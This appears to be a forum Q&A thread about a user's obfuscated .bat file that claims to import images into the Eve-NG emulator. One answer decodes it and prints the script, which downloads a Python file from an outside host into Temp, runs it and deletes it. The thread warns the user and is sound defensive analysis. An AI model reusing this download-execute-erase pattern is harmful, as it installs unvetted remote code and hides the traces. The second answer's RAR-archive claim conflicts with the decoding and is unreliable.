# How can i edit this Batch File?

Tags: windows, command-line, batch-file

I have downloaded a .Bat file, it is a script that is used to import images (IOS) to the "Eve-NG" emulator, I have never worked with "Script" and neither with batch files.

I would like to be able to edit this file, my intention is to change the path where the images are hosted, since this "Script" what it does is download the images remotely and then import them to "Eve-NG", I would like to change those parameters.

But when I open the file, I can only see "Unicode characters" like this.

```
ഊ敀档⁯景൦瀊⁹洭瀠灩椠獮慴汬ⴠ⁕楰൰挊獬਍楰㍰椠獮慴汬渠瑥業潫਍楰㍰椠獮慴汬挠汯牯摥਍畣汲ⴠ⁯┢獵牥牰景汩╥䅜灰慄慴䱜捯污呜浥屰整灭瀮≹栠瑴㩰⼯敳牣瑥搮整档浳条挮浯猯牣灩灴椯慭敧楫⹴祰ⴠ猭汳渭ⵯ敲潶敫਍汣൳猊慴瑲⼠⁢眯楡⁴祰桴湯∠甥敳灲潲楦敬尥灁䑰瑡屡潌慣屬敔灭瑜浥⹰祰ഢ搊汥⼠⁦┢獵牥牰景汩╥䅜灰慄慴䱜捯污呜浥屰整灭瀮≹਍慰獵൥
```

Could you give me some idea how to work with these files and what should I learn?

This is the file [Batch File Link - Google Drive](https://drive.google.com/file/d/1wHGcOelesoSnr2CchGpTk3fz0clC28s-/view?usp=sharing)

Answer (score 2):

The first couple of bytes of the file seem to cause Notepad (and Notepad++ for that matter) to display junk.

However using the Unix `less` or `strings` command returns the following:

```
@echo off
py -m pip install -U pip
pip3 install netmiko
pip3 install colored
curl -o "%userprofile%\AppData\Local\Temp\temp.py" http://secret.dtechsmag.com/scriptp/imagekit.py --ssl-no-revoke
start /b /wait python "%userprofile%\AppData\Local\Temp\temp.py"
del /f "%userprofile%\AppData\Local\Temp\temp.py"
pause
```

I don't know python well enough to tell you if the content it downloads (and subsequently runs) from secret.dtechsmag.com is nefarious or not.

I would recommend that you exercise caution.

Answer (score 0):

This RAR archive contains a file that is not a `.bat` script, in spite of its name.

If it was described elsewhere as a `.bat` file, this is incorrect,
or the file is encoded/encrypted using some unknown utility.

You cannot work with this file without knowing how it was created or encoded,
and using the same application to decode/decrypt.